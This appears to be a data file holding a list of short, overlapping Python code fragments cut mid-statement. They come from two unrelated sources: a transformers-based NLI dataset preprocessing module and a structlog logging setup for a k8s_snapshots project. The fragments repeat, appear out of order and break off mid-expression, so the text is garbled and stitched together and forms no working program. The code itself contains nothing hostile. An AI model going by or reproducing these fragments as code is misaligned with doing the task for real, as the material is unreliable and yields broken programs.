"new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\"",
"label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left =",
"hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df =",
"all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask",
"input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with",
"([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length {} vs",
"in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__()",
"DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists):",
"self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new",
"= ([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1]",
"+ input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask",
"logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for l",
"= self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file):",
"f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset",
"get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label:",
"import torch import os import pandas as pd import numpy as np from",
"else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids",
"# tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0]",
"attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids =",
"name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples):",
"and removing double spaces :param data: data frame with the colum 'text' :type",
"df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return",
"base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a",
"real tokens and 0 for padding tokens. Only real # tokens are attended",
"path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df,",
"text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x)))",
"df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return",
"len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert",
"text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token",
"filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df):",
"attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids +",
"re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa remove space in",
"csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer",
"premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length",
"in range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example",
"text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token =",
"simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering, removing non",
"x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess",
"fucntion to parallelize a function applied to a df \"\"\" df_split = np.array_split(df,",
"for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features],",
"np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from",
"pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x):",
"n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def",
"pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param x:",
"with input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask,",
"\"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def",
"for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples",
"a NLI dataframe :param data: data frame with the colum 'text' :type data:",
"not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del",
"i in range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name)",
"self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs",
"word withou space in front :rtype: str \"\"\" try: if x[0] == \"",
"\" \": return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data,",
"= self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return label_map",
"hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token =",
"simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_",
"return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev",
"result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\",",
"training and dev sets.\"\"\" examples = [] n = df.shape[0] for i in",
"merge_lists(lists): base = [] for l in lists: base.extend(l) return base def parallelize_df2df(df,",
"space in front :rtype: str \"\"\" try: if x[0] == \" \": return",
"words, removing space in the first position and removing double spaces :param data:",
"from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils",
"inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The",
"def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type x: str",
"padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length)",
"result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from",
"padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask =",
"= self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features",
"dataf frame in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self,",
"self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has",
"len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label",
"text from a NLI dataframe :param data: data frame with the colum 'text'",
"= attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids =",
"drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores):",
"merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x",
"def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to",
"max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) ==",
"\"\"\" Apply preprocess on the input text from a NLI dataframe :param data:"
] |
[
"event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return event_dict def",
"def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is None:",
"structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer",
"event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not using json_log=True",
"value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints =",
"import OrderedDict from typing import Optional, List, Any, Dict import structlog import sys",
"getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error =",
"[ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter,",
"for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if",
"not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return event_dict def rename_level_to_severity(logger,",
"'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers':",
"level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False,",
"[ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None for hint",
"+= from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message') is",
"wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is",
"structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and",
"event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability",
"events event = event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum):",
"in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor def",
"is None: return event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order",
") foreign_pre_chain = [ # Add the log level and a timestamp to",
"'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level':",
"None: event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint",
"hint = event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except",
"indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps ) foreign_pre_chain =",
"structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name,",
"structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it",
"-> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict)",
"path_value(dict_: Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key in",
"dictionary keys. ``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed):",
"event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ]",
"method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is None:",
"the log level and a timestamp to the event_dict if the log entry",
"}, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(),",
"not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return",
"[ # Add the log level and a timestamp to the event_dict if",
"``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be formatted",
"-> Optional[Any]: value = dict_ for key in key_path.split('.'): if value is None:",
"Any, Dict import structlog import sys from k8s_snapshots import serialize class ProcessStructuredErrors: def",
"hint in hints if hint is not None) message = event_dict.get('message') if message",
"sys from k8s_snapshots import serialize class ProcessStructuredErrors: def __init__(self): pass def __call__(self, logger,",
"def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event = event_dict.get('event') if event",
"}, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, },",
"hints += from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message')",
"event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key",
"= event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return event_dict",
"0 ⇒ None indent = json_indent or None renderer = structlog.processors.JSONRenderer( indent=indent, serializer=serialize.dumps",
"for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ):",
"structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name == 'DEBUG': root_logger_level = 'DEBUG'",
"log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity,",
"callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return",
"str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if",
"hint is not None) message = event_dict.get('message') if message is not None: message",
"structlog.processors.format_exc_info, add_func_name, add_message, order_keys(key_order), structlog.stdlib.ProcessorFormatter.wrap_for_formatter, ] if for_humans: renderer = structlog.dev.ConsoleRenderer() # <===",
"Dict[str, Any], key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'):",
"method_name, event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint``",
"'__structlog__', None) if __structlog__ is not None: value = __structlog__() value = value.get(key)",
"def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return event_dict",
"it so that 0 ⇒ None indent = json_indent or None renderer =",
"event_dict['event'] hint = ', '.join(hint for hint in hints if hint is not",
"not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if key in event_dict:",
"and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint``",
"``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None)",
"not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error",
"``hint`` : ``Optional[str]`` will be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint =",
"if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def",
"event_dict): from k8s_snapshots import events event = event_dict.get('event') if event is None: return",
"value = __structlog__() value = value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint",
"structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒ None indent",
"return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not using",
"key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False) return event_dict return processor",
"= event_dict['event'] hint = ', '.join(hint for hint in hints if hint is",
"Order keys for JSON readability when not using json_log=True \"\"\" def processor(logger, method_name,",
"{ 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer,",
"exc_info return event_dict structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger,",
"serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and a timestamp",
"event_dict): event = event_dict.get('event') if event is not None and 'message' not in",
"is None: return value = path_value(ed, key_hint) return format_kv(key_hint, value) def from_key_hints(ed) ->",
"level and a timestamp to the event_dict if the log entry # is",
"for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper",
"\"\"\" Order keys for JSON readability when not using json_log=True \"\"\" def processor(logger,",
"logging_config = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter,",
"bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False,",
"} } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict, logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name,",
"= ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name,",
"json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent:",
"method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order): if",
"'': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG',",
"rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity'] = level.upper() return event_dict def",
"None) message = event_dict.get('message') if message is not None: message = f'{prefix}: {message},",
"<filename>k8s_snapshots/logconf.py<gh_stars>100-1000 import logging import logging.config from collections import OrderedDict from typing import Optional,",
"pass def __call__(self, logger, method_name, event_dict): exc_info = event_dict.pop('exc_info', None) if exc_info is",
"is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc,",
"logger_factory=structlog.stdlib.LoggerFactory(), wrapper_class=structlog.stdlib.BoundLogger, cache_logger_on_first_use=True, ) def foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event",
"level_name=level_name, ) def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order =",
"sys.stdout, 'formatter': 'structlog', }, }, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level,",
"if event is not None and 'message' not in event_dict: event_dict['message'] = event",
"event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message``",
"indent=indent, serializer=serialize.dumps ) foreign_pre_chain = [ # Add the log level and a",
"= record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when",
"from_key_hints(event_dict) if all(hint is None for hint in hints): if event_dict.get('message') is None:",
"from typing import Optional, List, Any, Dict import structlog import sys from k8s_snapshots",
"return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints",
"hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint is None",
"import Optional, List, Any, Dict import structlog import sys from k8s_snapshots import serialize",
"message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, )",
"configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name: str='INFO', for_humans:",
"__structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info'] = exc_info return event_dict",
"OrderedDict): return event_dict for key in reversed(order): if key in event_dict: event_dict.move_to_end(key, last=False)",
"def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not config['json_log'], json_indent=config['structlog_json_indent'] or None, ) def configure_logging( level_name:",
"event_dict): \"\"\" Creates a ``message`` value based on the ``hint`` and ``key_hint`` keys.",
"key_hints is None: return [] return [ format_kv(key_hint, path_value(ed, key_hint)) for key_hint in",
"}, 'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog',",
"1, 'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain,",
"exc_info = event_dict.pop('exc_info', None) if exc_info is None: return event_dict exc_type, exc, exc_tb",
"None: return try: return hint.format(**event_dict) except Exception as exc: return f'! error formatting",
"foreign_event_to_message(logger, method_name, event_dict): event = event_dict.get('event') if event is not None and 'message'",
"processor(logger, method_name, event_dict): if not isinstance(event_dict, OrderedDict): return event_dict for key in reversed(order):",
"record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON readability when not",
"'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity,",
"if exc_info is None: return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__",
"record = event_dict.get('_record') if record is None: return event_dict event_dict['function'] = record.funcName return",
"return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict) ] hints += from_key_hints(event_dict) if all(hint",
"configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level']",
"format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if key_hints is",
"``hint`` and ``key_hint`` keys. ``key_hint`` : ``Optional[str]`` a '.'-separated path of dictionary keys.",
"for key_hint in key_hints ] def format_kv(key: str, value: Any) -> str: return",
"return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint is",
") def configure_structlog( for_humans: bool=False, json_indent: Optional[int]=None, level_name: str='INFO' ): key_order = ['message',",
"ed.pop('key_hint', None) if key_hint is None: return value = path_value(ed, key_hint) return format_kv(key_hint,",
"level_name == 'DEBUG': root_logger_level = 'DEBUG' else: root_logger_level = 'ERROR' logging_config = {",
"key_hint) return format_kv(key_hint, value) def from_key_hints(ed) -> List[str]: key_hints = ed.pop('key_hints', None) if",
"foreign_pre_chain = [ # Add the log level and a timestamp to the",
"be formatted using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint",
": ``Optional[str]`` a '.'-separated path of dictionary keys. ``hint`` : ``Optional[str]`` will be",
"from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name ==",
"Make it so that 0 ⇒ None indent = json_indent or None renderer",
"value.get(key) return value def from_key_hint(ed) -> Optional[str]: key_hint = ed.pop('key_hint', None) if key_hint",
"event_dict.pop('hint', None) if hint is None: return try: return hint.format(**event_dict) except Exception as",
"'handlers': { 'default': { 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', },",
"}, 'loggers': { '': { 'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots':",
"return f'! error formatting message: {exc!r}' def path_value(dict_: Dict[str, Any], key_path: str) ->",
"using ``.format(**event_dict)``. \"\"\" def from_hint(ed): hint = event_dict.pop('hint', None) if hint is None:",
"event_dict['message'] = event_dict.get('event') return event_dict prefix = event_dict['event'] hint = ', '.join(hint for",
"exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__):",
"key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__",
"'disable_existing_loggers': False, 'formatters': { 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, },",
"configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent, level_name=level_name, )",
"return event_dict return processor def event_enum_to_str(logger, method_name, event_dict): from k8s_snapshots import events event",
"readability when not using json_log=True \"\"\" def processor(logger, method_name, event_dict): if not isinstance(event_dict,",
"structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\" Creates a ``message`` value based",
"Add the log level and a timestamp to the event_dict if the log",
"Any], key_path: str) -> Optional[Any]: value = dict_ for key in key_path.split('.'): if",
"processors = [ event_enum_to_str, ProcessStructuredErrors(), structlog.stdlib.add_logger_name, structlog.stdlib.add_log_level, rename_level_to_severity, timestamper, structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, add_func_name, add_message,",
"structured_error = __structlog__() event_dict['structured_error'] = structured_error return event_dict def add_message(logger, method_name, event_dict): \"\"\"",
"{hint}' else: message = f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config):",
"', '.join(hint for hint in hints if hint is not None) message =",
"event_dict['severity'] = level.upper() return event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if",
"event = event_dict.get('event') if event is None: return event_dict if isinstance(event, events.EventEnum): event_dict['event']",
"event_dict prefix = event_dict['event'] hint = ', '.join(hint for hint in hints if",
"True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config) structlog.configure( processors=processors, context_class=OrderedDict,",
"'handlers': ['default'], 'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } }",
"not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign'",
"= 'foreign' return event_dict def rename_level_to_severity(logger, method_name, event_dict): level = event_dict.pop('level', None) event_dict['severity']",
"'level': root_logger_level, 'propagate': True, }, 'k8s_snapshots': { 'level': 'DEBUG', } } } logging.config.dictConfig(logging_config)",
"None and 'message' not in event_dict: event_dict['message'] = event event_dict['event'] = 'foreign' return",
"structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': { 'level': level_name,",
"return event_dict exc_type, exc, exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None)",
") def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog( for_humans=for_humans, json_indent=json_indent,",
"renderer = structlog.dev.ConsoleRenderer() # <=== else: # Make it so that 0 ⇒",
"exc_tb = structlog.processors._figure_out_exc_info( exc_info) __structlog__ = getattr(exc, '__structlog__', None) if not callable(__structlog__): event_dict['exc_info']",
"value = dict_ for key in key_path.split('.'): if value is None: return __structlog__",
"{ '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': { 'default': {",
"hint is None: return try: return hint.format(**event_dict) except Exception as exc: return f'!",
"None for hint in hints): if event_dict.get('message') is None: event_dict['message'] = event_dict.get('event') return",
"= f'{prefix}: {hint}' event_dict['message'] = message return event_dict def configure_from_config(config): configure_logging( level_name=config['log_level'], for_humans=not",
"event_dict if the log entry # is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level,",
"is not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if",
"not from structlog. structlog.processors.StackInfoRenderer(), structlog.processors.format_exc_info, structlog.stdlib.add_log_level, structlog.stdlib.add_logger_name, foreign_event_to_message, rename_level_to_severity, timestamper, ] if level_name",
"event_dict def add_func_name(logger, method_rame, event_dict): record = event_dict.get('_record') if record is None: return",
"event_dict event_dict['function'] = record.funcName return event_dict def order_keys(order): \"\"\" Order keys for JSON",
"hints if hint is not None) message = event_dict.get('message') if message is not",
"{ 'level': level_name, 'class': 'logging.StreamHandler', 'stream': sys.stdout, 'formatter': 'structlog', }, }, 'loggers': {",
"key in key_path.split('.'): if value is None: return __structlog__ = getattr(value, '__structlog__', None)",
"Optional[int]=None, level_name: str='INFO' ): key_order = ['message', 'event', 'level'] timestamper = structlog.processors.TimeStamper(fmt='ISO') processors",
"event is not None and 'message' not in event_dict: event_dict['message'] = event event_dict['event']",
"OrderedDict from typing import Optional, List, Any, Dict import structlog import sys from",
"{ 'structlog': { '()': structlog.stdlib.ProcessorFormatter, 'processor': renderer, 'foreign_pre_chain': foreign_pre_chain, }, }, 'handlers': {",
"or None, ) def configure_logging( level_name: str='INFO', for_humans: bool=False, json_indent: Optional[int]=None, ): configure_structlog(",
"None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None: value",
"and a timestamp to the event_dict if the log entry # is not",
"is None: return __structlog__ = getattr(value, '__structlog__', None) if __structlog__ is not None:",
"format_kv(key: str, value: Any) -> str: return f'{key}={serialize.process(value)}' hints = [ from_hint(event_dict), from_key_hint(event_dict)",
